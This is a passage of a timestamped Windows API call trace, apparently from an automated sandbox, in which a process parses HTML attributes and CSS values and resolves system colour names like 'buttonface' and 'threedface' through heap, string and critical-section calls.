(CriticalSection=0x8c2758) returned 1 [0160.193] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.193] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.194] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.194] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.194] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3c28 [0160.194] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.194] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.194] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.194] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.195] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.195] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.195] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.196] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.196] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.197] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.197] StrChrW (lpStart="valign", wMatch=0x3a) returned 0x0 [0160.197] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.197] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.197] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.197] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.198] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.198] StrChrW (lpStart="nowrap", wMatch=0x3a) returned 0x0 [0160.198] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.198] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.198] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.198] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dcac0 [0160.198] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.199] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.199] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.199] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.199] memcpy_s (in: _Destination=0x6c5d9c, _DestinationSize=0x1ec4, _Source=0x9ee61ae, _SourceSize=0x8 | out: _Destination=0x6c5d9c) returned 0x0 [0160.199] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.200] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.200] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x9ef3e08 [0160.200] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.200] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.200] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.200] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.200] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.201] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.201] StrChrW (lpStart="tabindex", wMatch=0x3a) returned 0x0 [0160.201] IsCharSpaceW (wch=0x2d) returned 0 [0160.201] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.201] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.201] StrChrW (lpStart="wrap", wMatch=0x3a) returned 0x0 [0160.201] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x12) returned 0x6dc860 [0160.202] StrChrW (lpStart="readonly", wMatch=0x3a) returned 0x0 [0160.202] StrChrW (lpStart="style", wMatch=0x3a) returned 0x0 [0160.202] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.202] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.202] IsCharSpaceW (wch=0x66) returned 0 [0160.202] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.202] IsCharSpaceW (wch=0x3a) returned 0 [0160.202] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.202] IsCharSpaceW (wch=0x20) returned 1 [0160.202] IsCharSpaceW (wch=0x4d) returned 0 [0160.202] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.202] IsCharSpaceW (wch=0x20) returned 1 [0160.202] IsCharSpaceW (wch=0x53) returned 0 [0160.202] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.202] IsCharSpaceW (wch=0x20) returned 1 [0160.202] IsCharSpaceW (wch=0x44) returned 0 [0160.203] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.203] IsCharSpaceW (wch=0x3b) returned 0 [0160.203] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.203] IsCharSpaceW (wch=0x20) returned 1 [0160.203] IsCharSpaceW (wch=0x66) returned 0 [0160.203] IsCharSpaceW (wch=0x67) returned 0 [0160.203] IsCharSpaceW (wch=0x4d) returned 0 [0160.203] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x9ef3cf0 [0160.203] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.203] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.203] IsCharSpaceW (wch=0x3a) returned 0 [0160.203] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.203] IsCharSpaceW (wch=0x20) returned 1 [0160.203] IsCharSpaceW (wch=0x38) returned 0 [0160.203] IsCharAlphaNumericW (ch=0x38) returned 1 [0160.203] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.203] IsCharSpaceW (wch=0x3b) returned 0 [0160.204] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.204] IsCharSpaceW (wch=0xd) returned 1 [0160.204] IsCharSpaceW (wch=0xa) returned 1 [0160.204] IsCharSpaceW (wch=0x62) returned 0 [0160.204] IsCharSpaceW (wch=0x74) returned 0 [0160.204] IsCharSpaceW (wch=0x38) returned 0 [0160.204] IsCharSpaceW (wch=0x38) returned 0 [0160.204] IsCharSpaceW (wch=0x74) returned 0 [0160.204] IsCharSpaceW (wch=0x38) returned 0 [0160.204] IsCharSpaceW (wch=0x70) returned 0 [0160.204] IsCharSpaceW (wch=0x74) returned 0 [0160.204] IsCharSpaceW (wch=0x0) returned 0 [0160.204] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.204] IsCharSpaceW (wch=0x3a) returned 0 [0160.204] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.204] IsCharSpaceW (wch=0x20) returned 1 [0160.204] IsCharSpaceW (wch=0x62) returned 0 [0160.204] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.204] IsCharSpaceW (wch=0x3b) returned 0 [0160.204] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.204] IsCharSpaceW (wch=0x20) returned 1 [0160.204] IsCharSpaceW (wch=0x6f) returned 0 [0160.204] IsCharSpaceW (wch=0x65) returned 0 [0160.204] IsCharSpaceW (wch=0x62) returned 0 [0160.204] IsCharSpaceW (wch=0x62) returned 0 [0160.205] IsCharSpaceW (wch=0x65) returned 0 [0160.205] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.205] IsCharSpaceW (wch=0x62) returned 0 [0160.205] IsCharSpaceW (wch=0x75) returned 0 [0160.205] IsCharSpaceW (wch=0x74) returned 0 [0160.205] IsCharSpaceW (wch=0x74) returned 0 [0160.205] IsCharSpaceW (wch=0x6f) returned 0 [0160.205] IsCharSpaceW (wch=0x6e) returned 0 [0160.205] IsCharSpaceW (wch=0x66) returned 0 [0160.205] IsCharSpaceW (wch=0x61) returned 0 [0160.205] IsCharSpaceW (wch=0x63) returned 0 [0160.205] IsCharSpaceW (wch=0x65) returned 0 [0160.205] IsCharSpaceW (wch=0x75) returned 0 [0160.205] IsCharSpaceW (wch=0x74) returned 0 [0160.205] IsCharSpaceW (wch=0x74) returned 0 [0160.205] IsCharSpaceW (wch=0x6f) returned 0 [0160.205] IsCharSpaceW (wch=0x6e) returned 0 [0160.205] IsCharSpaceW (wch=0x66) returned 0 [0160.205] IsCharSpaceW (wch=0x61) returned 0 [0160.205] IsCharSpaceW (wch=0x63) returned 0 [0160.205] IsCharSpaceW (wch=0x65) returned 0 [0160.205] bsearch (_Key=0x199928, _Base=0x6d81eaa8, _NumOfElements=0x94, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x0 [0160.205] _wcsnicmp (_String1="buttonface", _String2="lightgrey", _MaxCount=0xa) returned -10 [0160.205] _wcsnicmp (_String1="buttonface", _String2="darkslateg", _MaxCount=0xa) returned -2 [0160.206] _wcsnicmp (_String1="buttonface", _String2="cornflower", _MaxCount=0xa) returned -1 [0160.206] _wcsnicmp (_String1="buttonface", _String2="blanchedal", _MaxCount=0xa) returned 9 [0160.206] _wcsnicmp (_String1="buttonface", _String2="burlywood", _MaxCount=0xa) returned 2 [0160.206] _wcsnicmp (_String1="buttonface", _String2="chartreuse", _MaxCount=0xa) returned -1 [0160.206] _wcsnicmp (_String1="buttonface", _String2="cadetblue", _MaxCount=0xa) returned -1 [0160.206] bsearch (_Key=0x199928, _Base=0x6d81e9c0, _NumOfElements=0x1d, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x6d81e9e8 [0160.206] _wcsnicmp (_String1="buttonface", _String2="inactiveca", _MaxCount=0xa) returned -7 [0160.206] _wcsnicmp (_String1="buttonface", _String2="buttonhigh", _MaxCount=0xa) returned -2 [0160.206] _wcsnicmp (_String1="buttonface", _String2="activecapt", _MaxCount=0xa) returned 1 [0160.206] _wcsnicmp (_String1="buttonface", _String2="background", _MaxCount=0xa) returned 20 [0160.206] _wcsnicmp (_String1="buttonface", _String2="buttonface", _MaxCount=0xa) returned 0 [0160.206] IsCharSpaceW (wch=0x0) returned 0 [0160.206] _wcsnicmp (_String1="none", _String2="none", _MaxCount=0x4) returned 0 [0160.206] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x9ee6d70 [0160.207] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.207] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.207] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.207] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.207] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x6dc900 [0160.207] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.207] IsCharSpaceW (wch=0x3a) returned 0 [0160.207] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.207] IsCharSpaceW (wch=0x20) returned 1 [0160.207] IsCharSpaceW (wch=0x68) returned 0 [0160.207] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.207] IsCharSpaceW (wch=0x3b) returned 0 [0160.207] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.207] IsCharSpaceW (wch=0x20) returned 1 [0160.207] IsCharSpaceW (wch=0x77) returned 0 [0160.208] IsCharSpaceW (wch=0x6e) returned 0 [0160.208] IsCharSpaceW (wch=0x68) returned 0 [0160.208] IsCharSpaceW (wch=0x68) returned 0 [0160.209] IsCharSpaceW (wch=0x6e) returned 0 [0160.209] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.209] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.209] IsCharSpaceW (wch=0x3a) returned 0 [0160.209] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.209] IsCharSpaceW (wch=0x20) returned 1 [0160.209] IsCharSpaceW (wch=0x32) returned 0 [0160.209] IsCharAlphaNumericW (ch=0x32) returned 1 [0160.209] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.209] IsCharSpaceW (wch=0x3b) returned 0 [0160.209] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.209] IsCharSpaceW (wch=0x20) returned 1 [0160.209] IsCharSpaceW (wch=0x68) returned 0 [0160.209] IsCharSpaceW (wch=0x6d) returned 0 [0160.209] IsCharSpaceW (wch=0x32) returned 0 [0160.209] IsCharSpaceW (wch=0x32) returned 0 [0160.209] IsCharSpaceW (wch=0x6d) returned 0 [0160.209] IsCharSpaceW (wch=0x32) returned 0 [0160.209] IsCharSpaceW (wch=0x65) returned 0 [0160.209] IsCharSpaceW (wch=0x6d) returned 0 [0160.209] IsCharSpaceW (wch=0x0) returned 0 [0160.210] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.210] IsCharSpaceW (wch=0x3a) returned 0 [0160.210] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.210] IsCharSpaceW (wch=0x20) returned 1 [0160.210] IsCharSpaceW (wch=0x33) returned 0 [0160.210] IsCharAlphaNumericW (ch=0x33) returned 1 [0160.210] IsCharAlphaNumericW (ch=0x2e) returned 0 [0160.210] IsCharSpaceW (wch=0x2e) returned 0 [0160.210] IsCharAlphaNumericW (ch=0x2e) returned 0 [0160.210] IsCharAlphaNumericW (ch=0x39) returned 1 [0160.210] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.210] IsCharSpaceW (wch=0x3b) returned 0 [0160.210] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.210] IsCharSpaceW (wch=0xd) returned 1 [0160.210] IsCharSpaceW (wch=0xa) returned 1 [0160.210] IsCharSpaceW (wch=0x62) returned 0 [0160.211] IsCharSpaceW (wch=0x6d) returned 0 [0160.211] IsCharSpaceW (wch=0x33) returned 0 [0160.211] IsCharSpaceW (wch=0x33) returned 0 [0160.211] IsCharSpaceW (wch=0x6d) returned 0 [0160.211] IsCharSpaceW (wch=0x33) returned 0 [0160.211] IsCharSpaceW (wch=0x65) returned 0 [0160.211] IsCharSpaceW (wch=0x6d) returned 0 [0160.211] IsCharSpaceW (wch=0x0) returned 0 [0160.211] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.211] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.211] IsCharSpaceW (wch=0x3a) returned 0 [0160.211] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.211] IsCharSpaceW (wch=0x20) returned 1 [0160.211] IsCharSpaceW (wch=0x30) returned 0 [0160.211] IsCharAlphaNumericW (ch=0x30) returned 1 [0160.211] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.211] IsCharSpaceW (wch=0x3b) returned 0 [0160.211] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.211] IsCharSpaceW (wch=0x78) returned 0 [0160.211] IsCharSpaceW (wch=0x30) returned 0 [0160.212] IsCharSpaceW (wch=0x30) returned 0 [0160.212] IsCharSpaceW (wch=0x78) returned 0 [0160.212] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d60 [0160.212] IsCharSpaceW (wch=0x30) returned 0 [0160.212] IsCharSpaceW (wch=0x30) returned 0 [0160.212] IsCharSpaceW (wch=0x70) returned 0 [0160.212] IsCharSpaceW (wch=0x78) returned 0 [0160.212] IsCharSpaceW (wch=0x30) returned 0 [0160.212] IsCharSpaceW (wch=0x70) returned 0 [0160.212] IsCharSpaceW (wch=0x78) returned 0 [0160.212] IsCharSpaceW (wch=0x0) returned 0 [0160.212] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0160.212] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d80 [0160.212] IsCharSpaceW (wch=0x30) returned 0 [0160.213] IsCharSpaceW (wch=0x30) returned 0 [0160.213] IsCharSpaceW (wch=0x70) returned 0 [0160.213] IsCharSpaceW (wch=0x78) returned 0 [0160.213] IsCharSpaceW (wch=0x30) returned 0 [0160.213] IsCharSpaceW (wch=0x70) returned 0 [0160.213] IsCharSpaceW (wch=0x78) returned 0 [0160.213] IsCharSpaceW (wch=0x0) returned 0 [0160.213] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.213] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d80 | out: hHeap=0x5e0000) returned 1 [0160.213] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d10 [0160.213] IsCharSpaceW (wch=0x30) returned 0 [0160.213] IsCharSpaceW (wch=0x30) returned 0 [0160.213] IsCharSpaceW (wch=0x70) returned 0 [0160.213] IsCharSpaceW (wch=0x78) returned 0 [0160.213] IsCharSpaceW (wch=0x30) returned 0 [0160.213] IsCharSpaceW (wch=0x70) returned 0 [0160.213] IsCharSpaceW (wch=0x78) returned 0 [0160.213] IsCharSpaceW (wch=0x0) returned 0 [0160.214] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d10 | out: hHeap=0x5e0000) returned 1 [0160.214] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6c70 [0160.214] IsCharSpaceW (wch=0x30) returned 0 [0160.214] IsCharSpaceW (wch=0x30) returned 0 [0160.214] IsCharSpaceW (wch=0x70) returned 0 [0160.214] IsCharSpaceW (wch=0x78) returned 0 [0160.214] IsCharSpaceW (wch=0x30) returned 0 [0160.214] IsCharSpaceW (wch=0x70) returned 0 [0160.214] IsCharSpaceW (wch=0x78) returned 0 [0160.214] IsCharSpaceW (wch=0x0) returned 0 [0160.214] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.214] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6c70 | out: hHeap=0x5e0000) returned 1 [0160.214] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d50 [0160.214] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xe) returned 0x6d9600 [0160.214] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0160.214] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x9ef3d18 [0160.214] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.215] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.215] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.215] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.215] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.216] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.216] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.216] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.217] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.217] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc) returned 0x6d9660 [0160.217] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.218] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.219] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.219] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9748 | out: hHeap=0x5e0000) returned 1 [0160.219] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.219] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.220] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.220] StrChrW (lpStart="style", wMatch=0x3a) returned 0x0 [0160.220] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.220] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.220] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.220] IsCharSpaceW (wch=0x62) returned 0 [0160.221] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.221] IsCharSpaceW (wch=0x3a) returned 0 [0160.221] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.221] IsCharSpaceW (wch=0x20) returned 1 [0160.221] IsCharSpaceW (wch=0x74) returned 0 [0160.221] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.221] IsCharSpaceW (wch=0x3b) returned 0 [0160.221] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.221] IsCharSpaceW (wch=0x20) returned 1 [0160.221] IsCharSpaceW (wch=0x70) returned 0 [0160.221] IsCharSpaceW (wch=0x65) returned 0 [0160.221] IsCharSpaceW (wch=0x74) returned 0 [0160.221] IsCharSpaceW (wch=0x74) returned 0 [0160.221] IsCharSpaceW (wch=0x65) returned 0 [0160.221] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.221] IsCharSpaceW (wch=0x74) returned 0 [0160.221] IsCharSpaceW (wch=0x68) returned 0 [0160.221] IsCharSpaceW (wch=0x72) returned 0 [0160.221] IsCharSpaceW (wch=0x65) returned 0 [0160.221] IsCharSpaceW (wch=0x65) returned 0 [0160.221] IsCharSpaceW (wch=0x64) returned 0 [0160.221] IsCharSpaceW (wch=0x66) returned 0 [0160.222] IsCharSpaceW (wch=0x61) returned 0 [0160.222] IsCharSpaceW (wch=0x63) returned 0 [0160.222] IsCharSpaceW (wch=0x65) returned 0 [0160.222] IsCharSpaceW (wch=0x68) returned 0 [0160.222] IsCharSpaceW (wch=0x72) returned 0 [0160.222] IsCharSpaceW (wch=0x65) returned 0 [0160.222] IsCharSpaceW (wch=0x65) returned 0 [0160.222] IsCharSpaceW (wch=0x64) returned 0 [0160.222] IsCharSpaceW (wch=0x66) returned 0 [0160.222] IsCharSpaceW (wch=0x61) returned 0 [0160.222] IsCharSpaceW (wch=0x63) returned 0 [0160.222] IsCharSpaceW (wch=0x65) returned 0 [0160.222] bsearch (_Key=0x199928, _Base=0x6d81eaa8, _NumOfElements=0x94, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x0 [0160.222] _wcsnicmp (_String1="threedface", _String2="lightgrey", _MaxCount=0xa) returned 8 [0160.222] _wcsnicmp (_String1="threedface", _String2="paleturquo", _MaxCount=0xa) returned 4 [0160.222] _wcsnicmp (_String1="threedface", _String2="silver", _MaxCount=0xa) returned 1 [0160.222] _wcsnicmp (_String1="threedface", _String2="teal", _MaxCount=0xa) returned 3 [0160.222] _wcsnicmp (_String1="threedface", _String2="wheat", _MaxCount=0xa) returned -3 [0160.222] _wcsnicmp (_String1="threedface", _String2="tomato", _MaxCount=0xa) returned -7 [0160.223] _wcsnicmp (_String1="threedface", _String2="thistle", _MaxCount=0xa) returned 9 [0160.223] bsearch (_Key=0x199928, _Base=0x6d81e9c0, _NumOfElements=0x1d, _SizeOfElements=0x8, _PtFuncCompare=0x6dd06a80) returned 0x6d81ea70 [0160.223] _wcsnicmp (_String1="threedface", _String2="inactiveca", _MaxCount=0xa) returned 11 [0160.223] _wcsnicmp (_String1="threedface", _String2="threeddark", _MaxCount=0xa) returned 2 [0160.223] _wcsnicmp (_String1="threedface", _String2="threedshad", _MaxCount=0xa) returned -13 [0160.223] _wcsnicmp (_String1="threedface", _String2="threedhigh", _MaxCount=0xa) returned -2 [0160.223] _wcsnicmp (_String1="threedface", _String2="threedface", _MaxCount=0xa) returned 0 [0160.223] IsCharSpaceW (wch=0x0) returned 0 [0160.223] _wcsnicmp (_String1="none", _String2="none", _MaxCount=0x4) returned 0 [0160.223] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6) returned 0x9ee6db0 [0160.223] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.223] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.223] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.224] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.224] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.225] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x16) returned 0x6dc9a0 [0160.225] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.225] IsCharSpaceW (wch=0x3a) returned 0 [0160.225] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.225] IsCharSpaceW (wch=0x20) returned 1 [0160.225] IsCharSpaceW (wch=0x61) returned 0 [0160.225] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.225] IsCharSpaceW (wch=0x3b) returned 0 [0160.225] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.225] IsCharSpaceW (wch=0xd) returned 1 [0160.225] IsCharSpaceW (wch=0xa) returned 1 [0160.225] IsCharSpaceW (wch=0x66) returned 0 [0160.225] IsCharSpaceW (wch=0x65) returned 0 [0160.225] IsCharSpaceW (wch=0x61) returned 0 [0160.225] IsCharSpaceW (wch=0x61) returned 0 [0160.225] IsCharSpaceW (wch=0x65) returned 0 [0160.225] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.225] IsCharSpaceW (wch=0x3a) returned 0 [0160.225] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.225] IsCharSpaceW (wch=0x20) returned 1 [0160.226] IsCharSpaceW (wch=0x6d) returned 0 [0160.226] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.226] IsCharSpaceW (wch=0x20) returned 1 [0160.226] IsCharSpaceW (wch=0x73) returned 0 [0160.226] IsCharAlphaNumericW (ch=0x20) returned 0 [0160.226] IsCharSpaceW (wch=0x20) returned 1 [0160.226] IsCharSpaceW (wch=0x73) returned 0 [0160.226] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.226] IsCharSpaceW (wch=0x3b) returned 0 [0160.226] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.226] IsCharSpaceW (wch=0x20) returned 1 [0160.226] IsCharSpaceW (wch=0x66) returned 0 [0160.226] IsCharSpaceW (wch=0x66) returned 0 [0160.226] IsCharSpaceW (wch=0x6d) returned 0 [0160.226] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x9ef3de0 [0160.226] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.226] IsCharSpaceW (wch=0x3a) returned 0 [0160.226] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.227] IsCharSpaceW (wch=0x20) returned 1 [0160.227] IsCharSpaceW (wch=0x38) returned 0 [0160.227] IsCharAlphaNumericW (ch=0x38) returned 1 [0160.227] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.227] IsCharSpaceW (wch=0x3b) returned 0 [0160.227] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.227] IsCharSpaceW (wch=0x20) returned 1 [0160.227] IsCharSpaceW (wch=0x74) returned 0 [0160.227] IsCharSpaceW (wch=0x74) returned 0 [0160.227] IsCharSpaceW (wch=0x38) returned 0 [0160.227] IsCharSpaceW (wch=0x38) returned 0 [0160.227] IsCharSpaceW (wch=0x74) returned 0 [0160.227] IsCharSpaceW (wch=0x38) returned 0 [0160.227] IsCharSpaceW (wch=0x70) returned 0 [0160.227] IsCharSpaceW (wch=0x74) returned 0 [0160.227] IsCharSpaceW (wch=0x0) returned 0 [0160.227] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.228] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.228] IsCharSpaceW (wch=0x3a) returned 0 [0160.228] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.228] IsCharSpaceW (wch=0x20) returned 1 [0160.228] IsCharSpaceW (wch=0x31) returned 0 [0160.228] IsCharAlphaNumericW (ch=0x31) returned 1 [0160.228] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.228] IsCharSpaceW (wch=0x3b) returned 0 [0160.228] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.228] IsCharSpaceW (wch=0xd) returned 1 [0160.228] IsCharSpaceW (wch=0xa) returned 1 [0160.228] IsCharSpaceW (wch=0x74) returned 0 [0160.228] IsCharSpaceW (wch=0x6d) returned 0 [0160.228] IsCharSpaceW (wch=0x31) returned 0 [0160.228] IsCharSpaceW (wch=0x31) returned 0 [0160.229] IsCharSpaceW (wch=0x6d) returned 0 [0160.229] IsCharSpaceW (wch=0x31) returned 0 [0160.229] IsCharSpaceW (wch=0x65) returned 0 [0160.229] IsCharSpaceW (wch=0x6d) returned 0 [0160.229] IsCharSpaceW (wch=0x0) returned 0 [0160.229] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.229] IsCharSpaceW (wch=0x3a) returned 0 [0160.229] IsCharAlphaNumericW (ch=0x3a) returned 0 [0160.229] IsCharSpaceW (wch=0x20) returned 1 [0160.229] IsCharSpaceW (wch=0x63) returned 0 [0160.229] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.229] IsCharSpaceW (wch=0x3b) returned 0 [0160.229] IsCharAlphaNumericW (ch=0x3b) returned 0 [0160.229] IsCharSpaceW (wch=0x20) returned 1 [0160.229] IsCharSpaceW (wch=0x77) returned 0 [0160.229] IsCharSpaceW (wch=0x72) returned 0 [0160.229] IsCharSpaceW (wch=0x63) returned 0 [0160.229] IsCharSpaceW (wch=0x63) returned 0 [0160.229] IsCharSpaceW (wch=0x72) returned 0 [0160.230] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0160.230] IsCharAlphaNumericW (ch=0x3d) returned 0 